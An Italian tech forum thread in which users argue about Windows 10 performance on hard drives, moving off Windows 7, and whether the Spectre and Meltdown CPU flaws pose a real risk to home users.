Poi ho messo l' ssd, che oviamente è un' altro pianeta, ma l' hd che avevo era leggermente scrauso :asd: e non andava come volevo io, anche con W7 e con W8.1, quindi non era un problema di SO, tutt' altro .

Magari se acquistavo un hd a 7200 rpm al posto di quello che avevo che era a 5400, già le cose miglioravano :) , poi ho deciso di prendere un ssd :p

E W10 da cannone e diventato un missile................:sofico:

si anche io dopo averlo fumato ho le tue sensazioni.. :sbonk:
poi da lucido, al mattino quando accendo il portatile che si inchioda, ho tutt'altre impressioni :read:

Mi stupisco di come in ufficio riusciamo ad utilizzare Win10 con HD meccanici su ben 3 PC e un portatile, una volta i miracoli erano una cosa rara ora accadono tutti i giorni.

:asd:
in effetti non è da me..

Sì l'abbiamo capito da mo' che ...non sei in te? :)


si, esattamente come successe 12 anni fa, ovvero con win Vista :read:


Ah OK, anche il DOS 4 (quello sviluppato da IBM) era buggato, instabile e si diceva scarso, ma che ci azzecca con Windows 10 e gli hard disk?

Vedo che non riesci a mantenerti perfettamente in tema senza svicolare. :mc:

E continui a non rispondere con parole tue e in semplice italiano alla solita domanda che per pietà dei poveri lettori, evito di riproporre. Il che non può non far arrivare alla conclusione che una risposta non ce l'hai e quindi quello che hai finora scritto è solo pura e scintillante fuffa da trolling mal eseguito :)

Mi stupisco di come in ufficio riusciamo ad utilizzare Win10 con HD meccanici su ben 3 PC e un portatile, una volta i miracoli erano una cosa rara ora accadono tutti i giorni.

Anche nell'officina dell'azienda in cui lavoro c'è W10 su HDD, vanno tutti benone. Ma forse facciamo parte di una setta e non lo sappiamo :asd:

Mi stupisco di come in ufficio riusciamo ad utilizzare Win10 con HD meccanici su ben 3 PC e un portatile, una volta i miracoli erano una cosa rara ora accadono tutti i giorni.

L'unico problema è per chi lo accende con frequenza... di più di 1 mese, e si becca un update garantito tutte le volte.

Qua si spacciano leggende urbane per prove!

Vista lavorava molto sotto il cofano per anticipare dati e programmi all'user, e chi ne faceva uso abituale poteva solo ringraziare, ma il popolo voleva vedere uso disco 0% e memoria libera tutta, quindi accontentiamoli, tanto son loro che pagano!
I problemi di Vista non SP1 erano altri.

Tornando IT, Microsoft è vero che stoppa da una data gli aggiornamenti e li fa a pagamento su richiesta (chiaramente non per i privati, suppongo per i costi), ma in occasione di particolari falle o criticità ha fatto update per tutti a costo 0 anche dopo la end of life.
E per questo non può esser condannata.

Qualcuno qua dentro dovrebbe iniziare dall'ABC dell'hardware iniziando propio dalle caratteristiche che contraddistinguono un SSD da un HDD. Quali sono i pregi, e quali i difetti e punti deboli. Avrebbe tutte le risposte alle domande stupide che pone. ;)

Ohi bentornato !

Qualcuno qua dentro dovrebbe iniziare dall'ABC dell'hardware iniziando propio dalle caratteristiche che contraddistinguono un SSD da un HDD. Quali sono i pregi, e quali i difetti e punti deboli. Avrebbe tutte le risposte alle domande stupide che pone. ;)
E' Adapter, segnalatelo.

Qualcuno qua dentro dovrebbe iniziare dall'ABC dell'hardware iniziando propio dalle caratteristiche che contraddistinguono un SSD da un HDD. Quali sono i pregi, e quali i difetti e punti deboli. Avrebbe tutte le risposte alle domande stupide che pone. ;)

Oh, ce ne hai messo di tempo per materializzarti nuovamente, vediamo quanto dura stavolta :O


E hai scritto tutto un papiro per dire nulla di concreto. Il solito elogio dell'inutilità... :D



ps. le domande sono mai stupide, esistono semmai risposte stupide. Tanto più stupide quanto non si sa come e cosa rispondere... L'antidoto perfetto alle risposte stupide è tacere.

Sì l'abbiamo capito da mo' che ...non sei in te? :)




Ah OK, anche il DOS 4 (quello sviluppato da IBM) era buggato, instabile e si diceva scarso, ma che ci azzecca con Windows 10 e gli hard disk?

Vedo che non riesci a mantenerti perfettamente in tema senza svicolare. :mc:

E continui a non rispondere con parole tue e in semplice italiano alla solita domanda che per pietà dei poveri lettori, evito di riproporre. Il che non può non far arrivare alla conclusione che una risposta non ce l'hai e quindi quello che hai finora scritto è solo pura e scintillante fuffa da trolling mal eseguito :)

l'ho gia scritto na pagina dietro: per la presenza di tutti quei servizi nominati, che insieme frullano l'HDD :read:

Oh, ce ne hai messo di tempo per materializzarti nuovamente, vediamo quanto dura stavolta :O


E hai scritto tutto un papiro per dire nulla di concreto. Il solito elogio dell'inutilità... :D



ps. le domande sono mai stupide, esistono semmai risposte stupide. Tanto più stupide quanto non si sa come e cosa rispondere... L'antidoto perfetto alle risposte stupide è tacere.

ma non segnalatelo :sofico:

ritornate in topic da soli o ci devo pensare io

Secondo voi perché uno che ha Windows7 perfettamente funzionante e senza mai un problema dovrebbe passare a Windows10?

Per questo secondo me verremo in qualche modo obbligati al passaggio.

Secondo voi perché uno che ha Windows7 perfettamente funzionante e senza mai un problema dovrebbe passare a Windows10?

Per questo secondo me verremo in qualche modo obbligati al passaggio.

Luke ti può illustrare la non sicurezza di windows 7, che è il motivo per cui ci è passato !

Luke ti può illustrare la non sicurezza di windows 7, che è il motivo per cui ci è passato !

ok ma io sono di quelli che sia a casa per divertimento che in ufficio per lavoro, non riesco a trovare un motivo per passare a Windows10.

ok ma io sono di quelli che sia a casa per divertimento che in ufficio per lavoro, non riesco a trovare un motivo per passare a Windows10.

Se gli applicativi che usi, vanno bene, se le tue periferiche, vanno bene, se non sei paranoico della sicurezza, motivi reali non ve ne sono...

Io l'ho fatto per avere un sistema più "moderno"...

Sono stato "obbligato", tra virgolette in quanto volendo il workaround si trova, con le nuove mainboard/processori, in quanto non è supportato ufficialmente win7.

ok ma io sono di quelli che sia a casa per divertimento che in ufficio per lavoro, non riesco a trovare un motivo per passare a Windows10.
Puoi anche restare con XP, se credi, ma nessun SO viene supportato in eterno. Win7 sarà abbandonato nel 2010 e credo che 10 anni siano un periodo più che accettabile per qualsiasi SO.

Luke ti può illustrare la non sicurezza di windows 7, che è il motivo per cui ci è passato !

esatto :sborone:
meno male che ogni tanto vengo preso seriamente :asd:

Secondo voi perché uno che ha Windows7 perfettamente funzionante e senza mai un problema dovrebbe passare a Windows10?

Per questo secondo me verremo in qualche modo obbligati al passaggio.

perchè corri il rischio di essere infettato da uno degli exploit che sfruttano il "side channel prediction" (o come se chiama) cioè il bug sfruttato dalle falle di spectre e meltdown...
a meno che non hai una mobo recente per la quale è uscito un bios nel 2018,
e che hai già flashato,
usare windows 7 oggi è equivalente a fare battleroyale sulla new york di J.Carpenter :sofico:

perchè corri il rischio di essere infettato da uno degli exploit che sfruttano il "side channel prediction" (o come se chiama) cioè il bug sfruttato dalle falle di spectre e meltdown...
a meno che non hai una mobo recente per la quale è uscito un bios nel 2018,
e che hai già flashato,
usare windows 7 oggi è equivalente a fare battleroyale sulla new york di J.Carpenter :sofico:

Chiaramente sei un esperto, non posso che fidarmi di te.

Mentre in azienda se si ha un firewall hardware si rischia lo stesso?

perchè corri il rischio di essere infettato da uno degli exploit che sfruttano il "side channel prediction" (o come se chiama) cioè il bug sfruttato dalle falle di spectre e meltdown...
a meno che non hai una mobo recente per la quale è uscito un bios nel 2018,
e che hai già flashato,
usare windows 7 oggi è equivalente a fare battleroyale sulla new york di J.Carpenter :sofico:

Ma concretamente visto che questi exploit vanno ad accedere alla porzione di memoria speculativa delle CPU, quante probabilità ci sono che vengano trafugati dati significativi?
Mi sembra, ma potrei sempre sbagliarmi che siano attacchi possibili molto in linea teorica, ma poco praticabili nella realtà, dato che al momento di attacchi portati con questo metodo mi pare non ne siano di noti.

Ma concretamente visto che questi exploit vanno ad accedere alla porzione di memoria speculativa delle CPU, quante probabilità ci sono che vengano trafugati dati significativi?
NESSUNA

Chiaramente sei un esperto, non posso che fidarmi di te.

Mentre in azienda se si ha un firewall hardware si rischia lo stesso?

ovviamente si, basta navigare siti compromessi.. che ti sparano javascript e ciao a tutti :asd:

Ma concretamente visto che questi exploit vanno ad accedere alla porzione di memoria speculativa delle CPU, quante probabilità ci sono che vengano trafugati dati significativi?
Mi sembra, ma potrei sempre sbagliarmi che siano attacchi possibili molto in linea teorica, ma poco praticabili nella realtà, dato che al momento di attacchi portati con questo metodo mi pare non ne siano di noti.

ce stanno ce stanno... l'ho linkato qualche pagina dietro.. 18 agosto ne sono usciti 2 :read:
il rischio non è il vedersi sottrarre file... il rischio è la presa di possesso del proprio pc, a mò di zombie machine

NESSUNA

AH SI? :read:
https://www.hwupgrade.it/forum/showthread.php?t=2860676
:read: :read: :mc:

AH SI? :read:
https://www.hwupgrade.it/forum/showthread.php?t=2860676
:read: :read: :mc:

Boh, sento sempre parlare di POTENZIALMENTE, ma di concreto ad oggi cosa c'è?

Di certo comprassi oggi un pc prenderei un procio AMD, ma credo al momento di stare al sicuro viste le remote possibilità di essere attaccato tramite queste vulnerabilità.

Boh, sento sempre parlare di POTENZIALMENTE, ma di concreto ad oggi cosa c'è?

Di certo comprassi oggi un pc prenderei un procio AMD, ma credo al momento di stare al sicuro viste le remote possibilità di essere attaccato tramite queste vulnerabilità.

lol
se lo compri OGGI sei sicuro che il bug è patchato...
il problea c'è se lo hai comprato IERI, non oggi :sbonk:

e comunque non ho capito il discorso del potenziale...
che significa? cioè un danno è potenziale fino a che non ti riguarda direttamente? :sbonk:

poi uno si chiede perchè hanno abilitato windows update forzatamente :rolleyes:
danno "potenziale"...
quello che se sommi al danno "cinetico" ti da il danno "totale" :sbonk:

e comunque non ho capito il discorso del potenziale...
che significa? cioè un danno è potenziale fino a che non ti riguarda direttamente? :sbonk:

Potenziale <> reale

La falla c'è, ma quanto è realizzabile un attacco di questo tipo?

Finora c'è tutta una serie di ipotesi, ma di concreto c'è ben poco, poi oh te sei l'esperto non metto in dubbio il tuo verbo, ma finora nel mondo quanti attacchi si sono verificati?

Potenziale <> reale

La falla c'è, ma quanto è realizzabile un attacco di questo tipo?

Finora c'è tutta una serie di ipotesi, ma di concreto c'è ben poco, poi oh te sei l'esperto non metto in dubbio il tuo verbo, ma finora nel mondo quanti attacchi si sono verificati?

io te posso dire che molte crew italiane erano convinte che ci sarebbe stata na pandemia il 26 Maggio 2018.. ossia quando è entrata in vigore la normativa GDPR..
la cosa non è accaduta, evidentemte O le crew piu cattive non hanno ancora il payload (che INTEL invece detiene) oppure se ne fregano del GDPR europeo e stanno aspettando qualche altro momento propizio.. ammesso che ce l'abbiano..

ora co ste premesse, tu ti fidi ad accendere windows 7 e magari a navigare su altadefinizione cb01 o altri siti che aprono popup a non finire? :stordita:
io, da quasi hater de windows10 (pur avendolo in ufficio), me lo sono messo a casa.. fai un pò te :asd:

io te posso dire che molte crew italiane erano convinte che ci sarebbe stata na pandemia il 26 Maggio 2018.. ossia quando è entrata in vigore la normativa GDPR..
la cosa non è accaduta, evidentemte O le crew piu cattive non hanno ancora il payload (che INTEL invece detiene) oppure se ne fregano del GDPR europeo e stanno aspettando qualche altro momento propizio.. ammesso che ce l'abbiano..

ora co ste premesse, tu ti fidi ad accendere windows 7 e magari a navigare su altadefinizione cb01 o altri siti che aprono popup a non finire? :stordita:
io, da quasi hater de windows10 (pur avendolo in ufficio), me lo sono messo a casa.. fai un pò te :asd:

Boh, vedendo dove e come sono queste vulnerabilità mi preoccuperei ben poco.

Poi ho win10 dal early adopter e sto collegato veramente poco col pc per cui mi sento abbastanza al sicuro, ma parlando di cache del processore, credo che al limite sarà possibile fare andare in crash la macchina iniettando valori casuali, ma arrivare a fare qualcos'altro di concreto da remoto visti i tempi di permanenza dei dati nella cache e quant'altro, la vedo dura per i malintenzionati.

Boh, vedendo dove e come sono queste vulnerabilità mi preoccuperei ben poco.

Poi ho win10 dal early adopter e sto collegato veramente poco col pc per cui mi sento abbastanza al sicuro, ma parlando di cache del processore, credo che al limite sarà possibile fare andare in crash la macchina iniettando valori casuali, ma arrivare a fare qualcos'altro di concreto da remoto visti i tempi di permanenza dei dati nella cache e quant'altro, la vedo dura per i malintenzionati.

mandare in crash la cpu a quei livelli (ring 0,1) significa che il DEP dell'OS non può proteggerti, e che quindi qualsiasi overflow potrebbe essere indirizzato ad altri registri.. senza che l'esecuzione del codice malevolo venga interrotta..
ovviamente fino a che non è pubblico un exploit tipo sasser o nimda, il tutto pare calmo.. quindi io non aspetterei... meglio passare a win10 o BSD o Linux..
oppure cambiare mobo co una piu recente..allora si che puoi usare win7 (per 2 anni) :ciapet:

è in grandissima forma dai visto che tiene banco praticamente da solo :asd:, presto lo troveremo anzi anche a dar consigli sul thread ufficiale di 10 cosi' è la volta che mi disiscrivo direttamente (da quella discussione) :D

Non bastano infatti 2 emoticon(s) sorridenti a cancellare le minchiate che escono sistematicamente da quella bocca (con buona pace chiaramente dei suoi pochi supporter :O che vi rinvengono invece validi spunti di riflessione)...

è in grandissima forma dai visto che tiene banco praticamente da solo :asd:, presto lo troveremo anzi anche a dar consigli sul thread ufficiale di 10 cosi' è la volta che mi disiscrivo direttamente (da quella discussione) :D

Non bastano infatti 2 emoticon(s) sorridenti a cancellare le minchiate che escono sistematicamente da quella bocca (con buona pace chiaramente dei suoi pochi supporter :O che vi rinvengono invece validi spunti di riflessione)...

e quali sarebbero ste minchiate :sofico:

è in grandissima forma dai visto che tiene banco praticamente da solo :asd:, presto lo troveremo anzi anche a dar consigli sul thread ufficiale di 10 cosi' è la volta che mi disiscrivo direttamente (da quella discussione) :D

Non bastano infatti 2 emoticon(s) sorridenti a cancellare le minchiate che escono sistematicamente da quella bocca (con buona pace chiaramente dei suoi pochi supporter :O che vi rinvengono invece validi spunti di riflessione)...

Invece che disiscriverti usa l'ignore list. Non vedi più le minchiate (tranne nei quote) e tanti saluti. :D

Potenziale <> reale

La falla c'è, ma quanto è realizzabile un attacco di questo tipo?

Finora c'è tutta una serie di ipotesi, ma di concreto c'è ben poco, poi oh te sei l'esperto non metto in dubbio il tuo verbo, ma finora nel mondo quanti attacchi si sono verificati?
Anche aldilà della fattibilità dell'attacco, quante probabilità ci sono che tu venga attaccato ?
Anche se fosse chi organizza questo tipo di attacchi lo rivolge alle aziende e non ai terminali privati.

Inoltre ci sono vulnerabilità anche altrove su altre tecnologie, fissarsi proprio con la vulnerabilità delle cpu è solita sega mentale.

Anche aldilà della fattibilità dell'attacco, quante probabilità ci sono che tu venga attaccato ?
Anche se fosse chi organizza questo tipo di attacchi lo rivolge alle aziende e non ai terminali privati.

Inoltre ci sono vulnerabilità anche altrove su altre tecnologie, fissarsi proprio con la vulnerabilità delle cpu è solita sega mentale.

ma nimda, blaster e sasser non v'hanno insegnato nulla :eek:

lol
e comunque non ho capito il discorso del potenziale...
che significa? cioè un danno è potenziale fino a che non ti riguarda direttamente? :sbonk:
un danno è potenziale fino a quando non viene eseguito, altrimenti è IL NULLA.

e ad oggi hanno fatto molti piu danni i ransomware che questi "bugs" che POTENZIALMENTE sono sfruttabili su cpu di oltre 10 anni fa fino a oggi.

se lasci la tua automobile con le chiavi dentro, te ne vai e al tuo ritorno la macchina è ancora li è uguale ad averla chiusa, anche se "potenzialmente" potevano prendertela con facilità.

è un pò diverso cmq il discorso, si tratta di buchi hardware, d'accordo al momento potenziali, ma l'utente c'entra poco come colpa, o cmq meno che negli altri casi citati.
espandendo l'esempio fatto, sarebbe come se la serratura fosse difettosa potenzialmente e non basti chiudera, non tanto scordarsi di farlo...

poi ognuno faccia come vuole, ma minimizzare sempre e comunque mi pare esagerato (come anche stracciarsi le vesti, ad ora)

il tutto a maggior ragione visti i costi (in prestazioni o in 'obbligo' di upgrade macchina) per chiudere

es altri os tipo bsd (se non sbaglio openbsd in particoalre), che sono particolarmente attenti a queste problematiche e quindi non da prendere sotto gamba, hanno ad ora fatto delle scelte molto drastiche per evitare il suddetto 'potenziale'

un danno è potenziale fino a quando non viene eseguito, altrimenti è IL NULLA.

e ad oggi hanno fatto molti piu danni i ransomware che questi "bugs" che POTENZIALMENTE sono sfruttabili su cpu di oltre 10 anni fa fino a oggi.

se lasci la tua automobile con le chiavi dentro, te ne vai e al tuo ritorno la macchina è ancora li è uguale ad averla chiusa, anche se "potenzialmente" potevano prendertela con facilità.

quindi Sasser fino a Luglio 2003 era il NULLA :sbonk:

quindi Sasser fino a Luglio 2003 era il NULLA :sbonk:
Infatti è proprio così, era una falla del SO come potrebbero essercene altre, ma fino a quando vengono scoperte e/o sfruttate sono il nulla.
Sei sicuro che il SO che utilizzi sia completamente senza falle?
No perché non puoi esserlo, però fino a che non verranno scoperte sono il nulla, anche perché fino a prova contraria non esistono.

ma nimda, blaster e sasser non v'hanno insegnato nulla :eek:

Ma come fai a paragonare quei worm con queste vulnerabilità hardware?

Quelle una volta scoperte le falle erano sciocchezze per il malwarewriter. Qui le falle si conoscono già da un anno in realtà, nei corridoi di intel da sempre forse, ma di conseguenze non se ne vedono ancora, a riprova che è molto più difficile da sfruttare dei worm da te menzionati.

Infatti è proprio così, era una falla del SO come potrebbero essercene altre, ma fino a quando vengono scoperte e/o sfruttate sono il nulla.
Sei sicuro che il SO che utilizzi sia completamente senza falle?
No perché non puoi esserlo, però fino a che non verranno scoperte sono il nulla, anche perché fino a prova contraria non esistono.

la tua filosofia andava bene negli anni 90, ai tempi di Bill Gates
che infatti nel 2003 fu purgato da tale atteggiamento :read:

ormai si deve prevenire, non ci sono margini,
avere una falla di tale portata equivale ad un rischio certo, non del SE ma del QUANDO :mc:

Ma come fai a paragonare quei worm con queste vulnerabilità hardware?

Quelle una volta scoperte le falle erano sciocchezze per il malwarewriter. Qui le falle si conoscono già da un anno in realtà, nei corridoi di intel da sempre forse, ma di conseguenze non se ne vedono ancora, a riprova che è molto più difficile da sfruttare dei worm da te menzionati.

peggio me sento!
una falla dell'OS, ad oggi, è comunque mitigabile tramite DEP..
una della CPU no :read:

peggio me sento!
una falla dell'OS, ad oggi, è comunque mitigabile tramite DEP..

In quel caso bastava un firewall, anche quello integrato in Windows, vedi un po'...


una della CPU no :read:


Ecco ora hai capito perché non le puoi paragonare? Quelle erano sciocchezze da sfruttare, queste un tantino moooolto più complicato. Fin quando non ci riescono veramente, non solo dimostrativi ma operazione vere sul campo di battaglia, direi che si può stare ragionevolmente tranquilli

better safe than sorry

Ecco ora hai capito perché non le puoi paragonare? Quelle erano sciocchezze da sfruttare, queste un tantino moooolto più complicato. Fin quando non ci riescono veramente, non solo dimostrativi ma operazione vere sul campo di battaglia, direi che si può stare ragionevolmente tranquilli

better safe than sorry

ecco, appunto :read:

Quelle erano sciocchezze da sfruttare
tutto è na sciocchezza da sfruttare, se pubblicano il payload o un POC (proof of concept, codice in c/perl che riporta l'exploit)..

nimda e sasser avevano bisogno ciascuno di un payload specifico per poter bucare il servizio COM che parsava il mime type, allora col payload potevi costruire un file .eml o .html ed era facile..

se domani uscisse il payload per triggerare meltdown v2 e successive, sarebbe BANALE estendere il POC e parametrizzarlo :read:

quindi il tuo discorso non regge :O

Se pubblicano, se domani, se dopodomani, se tra una settimana, un mese, un anno, una vita. Se mio nonno non fosse morto sarebbe ancora vivo.

Per il momento la situazione è altra, e sto bene come sto. Cioè non cedo prestazioni hardware e non rischio altri bug a causa di codice al momento inutile. Quando ci sarà il se, vedremo se questo se mi tocca o meno.

Ritornando in topic, per tutti quelli che quanta è cattiva Microsoft che farà pagare gli aggiornamenti dopo la fine del supporto ufficiale, è una operazione così squallida che anche altri lo fanno... :)

https://www.lffl.org/2018/09/ubuntu-14-04-esm.html

Ritornando in topic, per tutti quelli che quanta è cattiva Microsoft che farà pagare gli aggiornamenti dopo la fine del supporto ufficiale, è una operazione così squallida che anche altri lo fanno... :)

https://www.lffl.org/2018/09/ubuntu-14-04-esm.html
Ahh ecco, chi copia chi ? :) :Prrr:

Se pubblicano, se domani, se dopodomani, se tra una settimana, un mese, un anno, una vita. Se mio nonno non fosse morto sarebbe ancora vivo.

Per il momento la situazione è altra, e sto bene come sto. Cioè non cedo prestazioni hardware e non rischio altri bug a causa di codice al momento inutile. Quando ci sarà il se, vedremo se questo se mi tocca o meno.

auguri :sbonk:

auguri :sbonk:

Ne hai bisogno più tu che io, credimi... qui funziona tutto perfettamente anche senza SSD :D

Ne hai bisogno più tu che io, credimi... qui funziona tutto perfettamente anche senza SSD :D

io no tutti i miei sistemi passano sto test :sborone:
https://www.grc.com/inspectre.htm

i tuoi? :read: :mc: